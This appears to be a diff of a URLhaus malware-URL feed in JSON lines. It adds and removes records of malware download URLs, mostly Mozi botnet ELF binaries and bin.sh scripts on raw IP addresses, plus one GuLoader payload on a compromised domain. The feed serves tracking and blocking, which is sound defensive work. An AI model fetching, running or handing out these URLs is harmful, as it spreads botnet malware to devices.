+{"id":"961331","urlhaus_reference":"https://urlhaus.abuse.ch/url/961331/","url":"http://89.160.20.156:35927/Mozi.m","url_status":"online","host":"89.160.20.156","date_added":"2021-01-14 19:51:04 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]} +{"id":"961332","urlhaus_reference":"https://urlhaus.abuse.ch/url/961332/","url":"http://89.160.20.156:55558/Mozi.m","url_status":"online","host":"89.160.20.156","date_added":"2021-01-14 19:51:04 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]} +{"id":"961333","urlhaus_reference":"https://urlhaus.abuse.ch/url/961333/","url":"http://89.160.20.156:60558/Mozi.m","url_status":"online","host":"89.160.20.156","date_added":"2021-01-14 19:51:04 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]} +{"id":"961334","urlhaus_reference":"https://urlhaus.abuse.ch/url/961334/","url":"http://89.160.20.156:59624/Mozi.m","url_status":"online","host":"89.160.20.156","date_added":"2021-01-14 19:51:04 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]} +{"id":"961335","urlhaus_reference":"https://urlhaus.abuse.ch/url/961335/","url":"http://89.160.20.156:39386/Mozi.m","url_status":"online","host":"89.160.20.156","date_added":"2021-01-14 19:51:04 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]} +{"id":"961322","urlhaus_reference":"https://urlhaus.abuse.ch/url/961322/","url":"http://89.160.20.156:46289/Mozi.m","url_status":"online","host":"89.160.20.156","date_added":"2021-01-14 19:50:06 
UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]}
+{"id":"961323","urlhaus_reference":"https://urlhaus.abuse.ch/url/961323/","url":"http://89.160.20.156:34951/Mozi.m","url_status":"offline","host":"89.160.20.156","date_added":"2021-01-14 19:50:06 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]}
+{"id":"961324","urlhaus_reference":"https://urlhaus.abuse.ch/url/961324/","url":"http://89.160.20.156:47594/Mozi.m","url_status":"online","host":"89.160.20.156","date_added":"2021-01-14 19:50:06 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]}
+{"id":"961325","urlhaus_reference":"https://urlhaus.abuse.ch/url/961325/","url":"http://89.160.20.156:55792/Mozi.m","url_status":"online","host":"89.160.20.156","date_added":"2021-01-14 19:50:06 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]}
+{"id":"961326","urlhaus_reference":"https://urlhaus.abuse.ch/url/961326/","url":"http://89.160.20.156:35271/Mozi.m","url_status":"online","host":"89.160.20.156","date_added":"2021-01-14 19:50:06 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]}
+{"id":"961327","urlhaus_reference":"https://urlhaus.abuse.ch/url/961327/","url":"http://89.160.20.156:36300/Mozi.m","url_status":"offline","host":"89.160.20.156","date_added":"2021-01-14 19:50:06 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]}
+{"id":"961328","urlhaus_reference":"https://urlhaus.abuse.ch/url/961328/","url":"http://89.160.20.156:60680/Mozi.m","url_status":"online","host":"89.160.20.156","date_added":"2021-01-14 19:50:06 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]}
+{"id":"961329","urlhaus_reference":"https://urlhaus.abuse.ch/url/961329/","url":"http://89.160.20.156:51132/Mozi.a","url_status":"online","host":"89.160.20.156","date_added":"2021-01-14 19:50:06 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]}
+{"id":"961330","urlhaus_reference":"https://urlhaus.abuse.ch/url/961330/","url":"http://89.160.20.156:39049/Mozi.m","url_status":"online","host":"89.160.20.156","date_added":"2021-01-14 19:50:06 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]}
+{"id":"961321","urlhaus_reference":"https://urlhaus.abuse.ch/url/961321/","url":"http://89.160.20.156:57455/Mozi.m","url_status":"online","host":"89.160.20.156","date_added":"2021-01-14 19:49:12 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]}
+{"id":"961320","urlhaus_reference":"https://urlhaus.abuse.ch/url/961320/","url":"http://89.160.20.156:32823/Mozi.m","url_status":"online","host":"89.160.20.156","date_added":"2021-01-14 19:49:08 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]}
+{"id":"961318","urlhaus_reference":"https://urlhaus.abuse.ch/url/961318/","url":"http://89.160.20.156:44103/Mozi.a","url_status":"online","host":"89.160.20.156","date_added":"2021-01-14 19:49:05 
UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]}
+{"id":"961319","urlhaus_reference":"https://urlhaus.abuse.ch/url/961319/","url":"http://89.160.20.156:36257/Mozi.m","url_status":"offline","host":"89.160.20.156","date_added":"2021-01-14 19:49:05 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]}
+{"id":"961317","urlhaus_reference":"https://urlhaus.abuse.ch/url/961317/","url":"http://89.160.20.156:41921/bin.sh","url_status":"online","host":"89.160.20.156","date_added":"2021-01-14 19:45:05 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"geenensp","larted":"true","tags":["32-bit","elf","mips"]}
+{"id":"961316","urlhaus_reference":"https://urlhaus.abuse.ch/url/961316/","url":"http://89.160.20.156:50971/i","url_status":"online","host":"89.160.20.156","date_added":"2021-01-14 19:44:04 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"geenensp","larted":"true","tags":["32-bit","elf","mips"]}
+{"id":"961315","urlhaus_reference":"https://urlhaus.abuse.ch/url/961315/","url":"http://89.160.20.156:56339/Mozi.m","url_status":"offline","host":"89.160.20.156","date_added":"2021-01-14 19:36:13 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]}
+{"id":"961314","urlhaus_reference":"https://urlhaus.abuse.ch/url/961314/","url":"http://89.160.20.156:52551/Mozi.m","url_status":"online","host":"89.160.20.156","date_added":"2021-01-14 19:36:09 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]}
+{"id":"961312","urlhaus_reference":"https://urlhaus.abuse.ch/url/961312/","url":"http://89.160.20.156:35942/Mozi.m","url_status":"online","host":"89.160.20.156","date_added":"2021-01-14 19:36:08 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]}
+{"id":"961313","urlhaus_reference":"https://urlhaus.abuse.ch/url/961313/","url":"http://89.160.20.156:39636/Mozi.a","url_status":"online","host":"89.160.20.156","date_added":"2021-01-14 19:36:08 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]}
+{"id":"961310","urlhaus_reference":"https://urlhaus.abuse.ch/url/961310/","url":"http://89.160.20.156:53548/Mozi.m","url_status":"offline","host":"89.160.20.156","date_added":"2021-01-14 19:36:07 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]}
+{"id":"961311","urlhaus_reference":"https://urlhaus.abuse.ch/url/961311/","url":"http://89.160.20.156:40967/Mozi.m","url_status":"online","host":"89.160.20.156","date_added":"2021-01-14 19:36:07 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]}
+{"id":"961309","urlhaus_reference":"https://urlhaus.abuse.ch/url/961309/","url":"http://89.160.20.156:49471/Mozi.m","url_status":"online","host":"89.160.20.156","date_added":"2021-01-14 19:36:06 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]}
+{"id":"961302","urlhaus_reference":"https://urlhaus.abuse.ch/url/961302/","url":"http://89.160.20.156:43937/Mozi.m","url_status":"online","host":"89.160.20.156","date_added":"2021-01-14 19:36:05 
UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]}
+{"id":"961303","urlhaus_reference":"https://urlhaus.abuse.ch/url/961303/","url":"http://89.160.20.156:57992/Mozi.a","url_status":"online","host":"89.160.20.156","date_added":"2021-01-14 19:36:05 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]}
+{"id":"961304","urlhaus_reference":"https://urlhaus.abuse.ch/url/961304/","url":"http://89.160.20.156:43603/Mozi.m","url_status":"online","host":"89.160.20.156","date_added":"2021-01-14 19:36:05 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]}
+{"id":"961305","urlhaus_reference":"https://urlhaus.abuse.ch/url/961305/","url":"http://89.160.20.156:37157/Mozi.a","url_status":"online","host":"89.160.20.156","date_added":"2021-01-14 19:36:05 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]}
+{"id":"961306","urlhaus_reference":"https://urlhaus.abuse.ch/url/961306/","url":"http://89.160.20.156:37229/Mozi.m","url_status":"online","host":"89.160.20.156","date_added":"2021-01-14 19:36:05 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]}
+{"id":"961307","urlhaus_reference":"https://urlhaus.abuse.ch/url/961307/","url":"http://89.160.20.156:49104/Mozi.m","url_status":"online","host":"89.160.20.156","date_added":"2021-01-14 19:36:05 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]}
+{"id":"961308","urlhaus_reference":"https://urlhaus.abuse.ch/url/961308/","url":"http://89.160.20.156:49575/Mozi.m","url_status":"online","host":"89.160.20.156","date_added":"2021-01-14 19:36:05 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]}
+{"id":"961299","urlhaus_reference":"https://urlhaus.abuse.ch/url/961299/","url":"http://89.160.20.156:50000/Mozi.a","url_status":"online","host":"89.160.20.156","date_added":"2021-01-14 19:35:06 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]}
+{"id":"961300","urlhaus_reference":"https://urlhaus.abuse.ch/url/961300/","url":"http://89.160.20.156:36251/Mozi.m","url_status":"online","host":"89.160.20.156","date_added":"2021-01-14 19:35:06 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]}
+{"id":"961301","urlhaus_reference":"https://urlhaus.abuse.ch/url/961301/","url":"http://89.160.20.156:51932/Mozi.m","url_status":"online","host":"89.160.20.156","date_added":"2021-01-14 19:35:06 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]}
+{"id":"961297","urlhaus_reference":"https://urlhaus.abuse.ch/url/961297/","url":"http://89.160.20.156:45660/Mozi.m","url_status":"online","host":"89.160.20.156","date_added":"2021-01-14 19:35:05 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]}
+{"id":"961298","urlhaus_reference":"https://urlhaus.abuse.ch/url/961298/","url":"http://89.160.20.156:42478/Mozi.m","url_status":"online","host":"89.160.20.156","date_added":"2021-01-14 19:35:05 
UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]}
+{"id":"961296","urlhaus_reference":"https://urlhaus.abuse.ch/url/961296/","url":"http://89.160.20.156:50726/Mozi.m","url_status":"online","host":"89.160.20.156","date_added":"2021-01-14 19:34:04 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]}
+{"id":"961295","urlhaus_reference":"https://urlhaus.abuse.ch/url/961295/","url":"http://89.160.20.156:40256/i","url_status":"offline","host":"89.160.20.156","date_added":"2021-01-14 19:33:04 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"geenensp","larted":"true","tags":["32-bit","elf","mips"]}
+{"id":"961294","urlhaus_reference":"https://urlhaus.abuse.ch/url/961294/","url":"http://89.160.20.156:50971/bin.sh","url_status":"online","host":"89.160.20.156","date_added":"2021-01-14 19:29:04 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"geenensp","larted":"true","tags":["32-bit","elf","mips"]}
 {"id":"961293","urlhaus_reference":"https://urlhaus.abuse.ch/url/961293/","url":"https://realestatederivatives.com.ng/zx/janomo_hfWUGQvSPn0.bin","url_status":"online","host":"realestatederivatives.com.ng","date_added":"2021-01-14 19:24:07 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"abused_legit_malware","surbl":"not listed"},"reporter":"abuse_ch","larted":"true","tags":["encrypted","GuLoader"]}
-{"id":"961291","urlhaus_reference":"https://urlhaus.abuse.ch/url/961291/","url":"http://59.97.169.164:33946/Mozi.m","url_status":"offline","host":"59.97.169.164","date_added":"2021-01-14 19:22:05 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not 
listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]}
-{"id":"961292","urlhaus_reference":"https://urlhaus.abuse.ch/url/961292/","url":"http://58.249.13.69:39990/Mozi.a","url_status":"online","host":"58.249.13.69","date_added":"2021-01-14 19:22:05 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]}
-{"id":"961288","urlhaus_reference":"https://urlhaus.abuse.ch/url/961288/","url":"http://61.52.86.202:60558/Mozi.m","url_status":"online","host":"61.52.86.202","date_added":"2021-01-14 19:22:04 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]}
-{"id":"961289","urlhaus_reference":"https://urlhaus.abuse.ch/url/961289/","url":"http://61.52.76.45:32989/Mozi.a","url_status":"online","host":"61.52.76.45","date_added":"2021-01-14 19:22:04 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]}
-{"id":"961290","urlhaus_reference":"https://urlhaus.abuse.ch/url/961290/","url":"http://61.52.26.66:52458/Mozi.m","url_status":"online","host":"61.52.26.66","date_added":"2021-01-14 19:22:04 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]}
-{"id":"961286","urlhaus_reference":"https://urlhaus.abuse.ch/url/961286/","url":"http://203.212.246.231:60735/Mozi.m","url_status":"online","host":"203.212.246.231","date_added":"2021-01-14 19:21:05 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]}
-{"id":"961287","urlhaus_reference":"https://urlhaus.abuse.ch/url/961287/","url":"http://186.33.104.197:34755/Mozi.m","url_status":"online","host":"186.33.104.197","date_added":"2021-01-14 19:21:05 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]}
-{"id":"961285","urlhaus_reference":"https://urlhaus.abuse.ch/url/961285/","url":"http://41.86.19.146:39290/Mozi.m","url_status":"offline","host":"41.86.19.146","date_added":"2021-01-14 19:21:04 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]}
-{"id":"961279","urlhaus_reference":"https://urlhaus.abuse.ch/url/961279/","url":"http://182.126.86.107:56141/Mozi.m","url_status":"online","host":"182.126.86.107","date_added":"2021-01-14 19:20:05 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]}
-{"id":"961280","urlhaus_reference":"https://urlhaus.abuse.ch/url/961280/","url":"http://182.117.77.236:40247/Mozi.a","url_status":"online","host":"182.117.77.236","date_added":"2021-01-14 19:20:05 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]}
-{"id":"961281","urlhaus_reference":"https://urlhaus.abuse.ch/url/961281/","url":"http://61.53.42.182:36619/i","url_status":"offline","host":"61.53.42.182","date_added":"2021-01-14 19:20:05 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"geenensp","larted":"true","tags":["32-bit","elf","mips"]}
-{"id":"961282","urlhaus_reference":"https://urlhaus.abuse.ch/url/961282/","url":"http://125.41.141.246:43673/Mozi.m","url_status":"online","host":"125.41.141.246","date_added":"2021-01-14 19:20:05 
UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]}
-{"id":"961283","urlhaus_reference":"https://urlhaus.abuse.ch/url/961283/","url":"http://125.42.123.186:55726/Mozi.m","url_status":"online","host":"125.42.123.186","date_added":"2021-01-14 19:20:05 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]}
-{"id":"961284","urlhaus_reference":"https://urlhaus.abuse.ch/url/961284/","url":"http://182.119.86.244:59668/Mozi.m","url_status":"online","host":"182.119.86.244","date_added":"2021-01-14 19:20:05 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]}
-{"id":"961278","urlhaus_reference":"https://urlhaus.abuse.ch/url/961278/","url":"http://117.194.150.198:34391/Mozi.m","url_status":"online","host":"117.194.150.198","date_added":"2021-01-14 19:19:07 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]}
-{"id":"961277","urlhaus_reference":"https://urlhaus.abuse.ch/url/961277/","url":"http://117.242.209.61:49478/Mozi.m","url_status":"online","host":"117.242.209.61","date_added":"2021-01-14 19:19:06 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]}
-{"id":"961276","urlhaus_reference":"https://urlhaus.abuse.ch/url/961276/","url":"http://117.247.200.34:54670/Mozi.m","url_status":"offline","host":"117.247.200.34","date_added":"2021-01-14 19:19:05 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]}
-{"id":"961270","urlhaus_reference":"https://urlhaus.abuse.ch/url/961270/","url":"http://115.58.133.53:59599/Mozi.m","url_status":"online","host":"115.58.133.53","date_added":"2021-01-14 19:19:04 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]}
-{"id":"961271","urlhaus_reference":"https://urlhaus.abuse.ch/url/961271/","url":"http://115.56.130.11:45189/Mozi.a","url_status":"online","host":"115.56.130.11","date_added":"2021-01-14 19:19:04 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]}
-{"id":"961272","urlhaus_reference":"https://urlhaus.abuse.ch/url/961272/","url":"http://120.85.210.224:60805/Mozi.a","url_status":"online","host":"120.85.210.224","date_added":"2021-01-14 19:19:04 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]}
-{"id":"961273","urlhaus_reference":"https://urlhaus.abuse.ch/url/961273/","url":"http://115.56.27.220:38888/Mozi.m","url_status":"online","host":"115.56.27.220","date_added":"2021-01-14 19:19:04 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]}
-{"id":"961274","urlhaus_reference":"https://urlhaus.abuse.ch/url/961274/","url":"http://115.48.157.100:47869/Mozi.m","url_status":"online","host":"115.48.157.100","date_added":"2021-01-14 19:19:04 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]}
-{"id":"961275","urlhaus_reference":"https://urlhaus.abuse.ch/url/961275/","url":"http://103.157.241.40:57478/Mozi.m","url_status":"online","host":"103.157.241.40","date_added":"2021-01-14 19:19:04 
UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]}
-{"id":"961269","urlhaus_reference":"https://urlhaus.abuse.ch/url/961269/","url":"http://59.99.93.45:40256/bin.sh","url_status":"offline","host":"59.99.93.45","date_added":"2021-01-14 19:10:06 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"geenensp","larted":"true","tags":["32-bit","elf","mips"]}
-{"id":"961268","urlhaus_reference":"https://urlhaus.abuse.ch/url/961268/","url":"http://60.161.45.175:49035/Mozi.m","url_status":"online","host":"60.161.45.175","date_added":"2021-01-14 19:07:05 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]}
-{"id":"961266","urlhaus_reference":"https://urlhaus.abuse.ch/url/961266/","url":"http://61.54.215.77:41531/Mozi.m","url_status":"online","host":"61.54.215.77","date_added":"2021-01-14 19:07:04 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]}
-{"id":"961267","urlhaus_reference":"https://urlhaus.abuse.ch/url/961267/","url":"http://59.99.41.229:49596/Mozi.a","url_status":"offline","host":"59.99.41.229","date_added":"2021-01-14 19:07:04 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]}
-{"id":"961265","urlhaus_reference":"https://urlhaus.abuse.ch/url/961265/","url":"http://61.52.197.146:43584/Mozi.m","url_status":"online","host":"61.52.197.146","date_added":"2021-01-14 19:07:03 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]}
-{"id":"961264","urlhaus_reference":"https://urlhaus.abuse.ch/url/961264/","url":"http://59.92.181.82:44976/Mozi.m","url_status":"offline","host":"59.92.181.82","date_added":"2021-01-14 19:06:07 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]}
-{"id":"961259","urlhaus_reference":"https://urlhaus.abuse.ch/url/961259/","url":"http://58.249.75.46:51107/Mozi.m","url_status":"online","host":"58.249.75.46","date_added":"2021-01-14 19:06:05 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]}
-{"id":"961260","urlhaus_reference":"https://urlhaus.abuse.ch/url/961260/","url":"http://42.227.162.7:33790/Mozi.m","url_status":"online","host":"42.227.162.7","date_added":"2021-01-14 19:06:05 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]}
-{"id":"961261","urlhaus_reference":"https://urlhaus.abuse.ch/url/961261/","url":"http://219.157.26.241:58919/Mozi.m","url_status":"online","host":"219.157.26.241","date_added":"2021-01-14 19:06:05 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]}
-{"id":"961262","urlhaus_reference":"https://urlhaus.abuse.ch/url/961262/","url":"http://59.93.21.48:40395/Mozi.m","url_status":"offline","host":"59.93.21.48","date_added":"2021-01-14 19:06:05 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]}
-{"id":"961263","urlhaus_reference":"https://urlhaus.abuse.ch/url/961263/","url":"http://59.92.216.111:53510/Mozi.m","url_status":"online","host":"59.92.216.111","date_added":"2021-01-14 19:06:05 
UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]}
-{"id":"961258","urlhaus_reference":"https://urlhaus.abuse.ch/url/961258/","url":"http://183.17.147.46:39115/Mozi.m","url_status":"online","host":"183.17.147.46","date_added":"2021-01-14 19:05:12 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]}
-{"id":"961257","urlhaus_reference":"https://urlhaus.abuse.ch/url/961257/","url":"http://123.14.93.124:40713/Mozi.m","url_status":"online","host":"123.14.93.124","date_added":"2021-01-14 19:05:11 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]}
-{"id":"961256","urlhaus_reference":"https://urlhaus.abuse.ch/url/961256/","url":"http://182.59.195.56:54811/Mozi.m","url_status":"online","host":"182.59.195.56","date_added":"2021-01-14 19:05:08 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]}
-{"id":"961255","urlhaus_reference":"https://urlhaus.abuse.ch/url/961255/","url":"http://153.37.155.55:58269/Mozi.a","url_status":"online","host":"153.37.155.55","date_added":"2021-01-14 19:05:07 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]}
-{"id":"961251","urlhaus_reference":"https://urlhaus.abuse.ch/url/961251/","url":"http://123.14.95.248:47985/Mozi.m","url_status":"online","host":"123.14.95.248","date_added":"2021-01-14 19:05:06 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]}
